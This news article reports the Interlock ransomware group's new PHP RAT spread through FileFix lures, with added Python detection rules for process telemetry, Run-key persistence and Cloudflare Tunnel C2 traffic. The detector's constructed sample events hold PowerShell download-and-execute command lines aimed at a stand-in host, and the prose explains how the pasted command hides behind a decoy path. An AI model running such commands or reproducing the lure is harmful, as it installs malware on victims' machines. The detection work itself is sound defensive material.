SecurityWeek

Malware & Threats

New Interlock RAT Variant Distributed via FileFix Attacks

The Interlock ransomware group has partnered with the KongTuke TDS to distribute a new RAT variant via FileFix attacks.

A new version of the Interlock ransomware group’s remote access trojan (RAT) is being distributed through compromised websites using FileFix, a variant of the ClickFix attack, security researchers warn.

ClickFix is a social engineering technique in which malicious code injected into a web page tricks the visitor into running an attacker-supplied command on their own system, under the guise of installing an update, fixing an error, or proving they are human.

FileFix is a variant in which the page tells the user that a file has been shared with them; a fake ‘Open File Explorer’ button launches File Explorer and, at the same time, copies PowerShell code to the clipboard.

The victim is then told to locate the shared file by pasting its path into File Explorer’s address bar and pressing Enter. What is pasted, however, is not a path but a PowerShell command, padded so that only a decoy file path is visible at the end of the address bar, and pressing Enter hands the whole string to PowerShell for execution, as security researcher mr.d0x reported.
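The execution chain described above leaves a distinctive trace in process-creation telemetry: a shell spawned directly by explorer.exe whose command line ends in a PowerShell comment carrying a plausible Windows path. The following is an added example, not code from the article, from mr.d0x or from The DFIR Report; it expresses that pattern as a rule over Sysmon Event ID 1-style records. The Sysmon field names are real, but every event, user name, path and the example.invalid URL below are constructed for the demo.

```python
"""Flag FileFix-style command execution in process-creation telemetry."""
import re
from typing import List, Optional

# Interpreters the address bar or Run dialog can hand a pasted command to.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# FileFix puts the real command first and a PowerShell comment ('#') holding a
# plausible Windows path last, so the victim sees only the "file path" in the
# address bar. Match that comment-plus-path tail.
DECOY_PATH = re.compile(r"#\s*(?:[A-Za-z]:\\|\\\\)[^\"'\r\n]+")

# Flags that have no business on a command line a user "pasted" by hand.
HIDDEN_OR_BYPASS = re.compile(
    r"-(?:windowstyle|w)\s+hidden"
    r"|-(?:executionpolicy|ep)\s+bypass"
    r"|-nop(?:rofile)?\b"
    r"|-(?:encodedcommand|enc|e)\s+[A-Za-z0-9+/=]{16,}",
    re.IGNORECASE,
)

# Constructed sample events in Sysmon EID 1 shape; none of this is real telemetry.
SAMPLE_EVENTS = [
    {   # ordinary double-click from Explorer: not a shell, ignored
        "User": "CORP\\alice",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt',
    },
    {   # FileFix: pasted into the address bar, decoy path after '#'
        "User": "CORP\\alice",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": (
            r'powershell.exe -w hidden -c "iex (iwr https://example.invalid/x)"'
            + " " * 40
            + r"# C:\company\internal-secure\filedrive\HRPolicy.docx"
        ),
    },
    {   # ClickFix via Win+R: same parent, hidden/bypass flags, no decoy path
        "User": "CORP\\bob",
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell.exe -w hidden -ep bypass -c "iex (iwr https://example.invalid/y)"',
    },
    {   # admin script from a console: bypass flag, but the parent is cmd.exe
        "User": "CORP\\svc-deploy",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\deploy.ps1",
    },
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or forward-slash) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> Optional[dict]:
    """Return a verdict for one process-creation event, or None if it looks benign."""
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"]
    if child not in SHELLS or parent != "explorer.exe":
        return None  # only shells spawned straight from Explorer matter here
    decoy = DECOY_PATH.search(cmd)
    flags = HIDDEN_OR_BYPASS.search(cmd)
    if decoy:  # the comment-hidden path is the FileFix signature
        return {"verdict": "filefix", "user": event["User"],
                "decoy_path": decoy.group(0)[1:].strip()}
    if flags:  # Explorer-spawned shell with hidden/bypass flags: Run-dialog ClickFix
        return {"verdict": "clickfix-like", "user": event["User"],
                "flag": flags.group(0)}
    return None


def detect(events) -> List[dict]:
    """Run classify() over a batch of events and keep only the hits."""
    return [hit for hit in map(classify, events) if hit]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The parent-process condition is what keeps the rule precise: the console-launched deployment script in the last sample carries a bypass flag too, but cmd.exe is its parent, so it is not reported. Tune `SHELLS` and `HIDDEN_OR_BYPASS` to your own environment before using the rule in production.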

Starting May 2025, The DFIR Report and Proofpoint observed Interlock RAT distribution activity associated with KongTuke (aka LandUpdate808), a sophisticated traffic distribution system (TDS) that leads to malware infections through a multi-stage process involving fake CAPTCHA lures.

The KongTuke web injections recently transitioned from ClickFix to FileFix and, in early June, started delivering a PHP variant of the Interlock RAT, The DFIR Report explains. In some cases the Node.js variant of the malware was delivered instead.


Upon execution, the RAT begins fingerprinting the system, using PowerShell commands to harvest and exfiltrate system information. It also checks the privileges the logged-in user has on the system.

Interlock RAT (linked to NodeSnake RAT) establishes persistence through a registry Run key and lets the attackers supply commands to be executed. In fact, The DFIR Report has observed strong evidence of hands-on-keyboard activity by the threat actors.

For command-and-control (C&C) communication, the malware relies on trycloudflare.com URLs, abusing the legitimate Cloudflare Tunnel service to hide its C&C.
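Two of the behaviours described above, a Run key that launches a script interpreter (the article names PHP and Node.js variants) and beaconing to trycloudflare.com hostnames, are cheap to hunt for in autorun and proxy data. The block below is an added example, not code from the article or from The DFIR Report. Every Run value, path, hostname and log line in it is constructed for the demo; the value name and file location used by the real RAT are not taken from the page and are assumed only for illustration.

```python
"""Hunt for Interlock-style persistence and Cloudflare Tunnel C2 in host and proxy data."""
import re
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Interpreters that should not normally be an autorun's first token.
SCRIPT_RUNTIMES = {"php.exe", "node.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Locations a standard user can write to; installed software normally lives elsewhere.
USER_WRITABLE = re.compile(
    r"\\(?:users\\[^\\]+\\appdata|users\\public|programdata|windows\\temp)\\",
    re.IGNORECASE,
)

# Quick tunnels get throwaway names under this zone; the service itself is legitimate.
TUNNEL_SUFFIX = ".trycloudflare.com"

# Constructed HKCU\...\Run values as (value name, command). The php.exe entry is
# a hypothetical RAT autorun, not an indicator from the page.
RUN_KEY_VALUES: List[Tuple[str, str]] = [
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("ChromeUpdater", r'"C:\Users\alice\AppData\Roaming\php\php.exe" "C:\Users\alice\AppData\Roaming\php\cfg.php"'),
    ("SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
]

# Constructed proxy log: timestamp, source IP, process, URL (one request per line).
PROXY_LOG = """\
2025-06-10T10:01:02Z 10.0.0.5 chrome.exe https://www.example.com/
2025-06-10T10:01:09Z 10.0.0.5 php.exe https://wide-cards-move-north.trycloudflare.com/
2025-06-10T10:03:41Z 10.0.0.7 OUTLOOK.EXE https://outlook.office.com/mail/
2025-06-10T10:05:17Z 10.0.0.5 php.exe https://wide-cards-move-north.trycloudflare.com/
2025-06-10T10:06:00Z 10.0.0.9 msedge.exe https://quiet-lamps-grow-soon.trycloudflare.com/
"""


def first_token(command: str) -> str:
    """Executable path from a Run value, honouring a leading quoted path."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def suspicious_run_values(values) -> List[str]:
    """Names of Run values that launch a script interpreter from a user-writable path."""
    hits = []
    for name, command in values:
        exe = first_token(command)
        if exe.rsplit("\\", 1)[-1].lower() in SCRIPT_RUNTIMES and USER_WRITABLE.search(exe):
            hits.append(name)
    return hits


def tunnel_hits(log: str) -> List[Dict[str, str]]:
    """Connections to *.trycloudflare.com, ranked by the process that made them."""
    hits = []
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # malformed line: skip it rather than abort the hunt
        ts, src, proc, url = parts
        host = (urlsplit(url).hostname or "").lower()
        if not host.endswith(TUNNEL_SUFFIX):
            continue
        # A script interpreter talking to a throwaway tunnel is the RAT pattern;
        # a browser doing the same may just be a developer sharing a local service.
        severity = "high" if proc.lower() in SCRIPT_RUNTIMES else "review"
        hits.append({"ts": ts, "src": src, "process": proc, "host": host, "severity": severity})
    return hits


def high_severity_hosts(hits) -> Dict[str, List[str]]:
    """Map each source IP to the sorted tunnel hostnames its scripted processes reached."""
    by_src: Dict[str, set] = {}
    for hit in hits:
        if hit["severity"] == "high":
            by_src.setdefault(hit["src"], set()).add(hit["host"])
    return {src: sorted(hosts) for src, hosts in by_src.items()}


if __name__ == "__main__":
    print("suspicious autoruns:", suspicious_run_values(RUN_KEY_VALUES))
    for hit in tunnel_hits(PROXY_LOG):
        print(hit)
    print("hosts to block per source:", high_severity_hosts(tunnel_hits(PROXY_LOG)))
```

Because Cloudflare Tunnel is a legitimate service, a bare match on the trycloudflare.com suffix is a triage signal rather than a block rule; the severity split above keys on the requesting process, and the per-source host list is the set you would take to the network team once the host is confirmed compromised.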

The researchers also observed RDP being used for lateral movement within the compromised environments, and note that the attackers hit multiple industries, which suggests the campaign is opportunistic.

“This discovery highlights the continued evolution of the Interlock group’s tooling and their operational sophistication. While the Node.js variant of Interlock RAT was known for its use of Node.js, this variant leverages PHP, a common web scripting language, to gain and maintain access to victim networks,” The DFIR Report notes.


Written By

Ionut Arghire is an international correspondent for SecurityWeek.
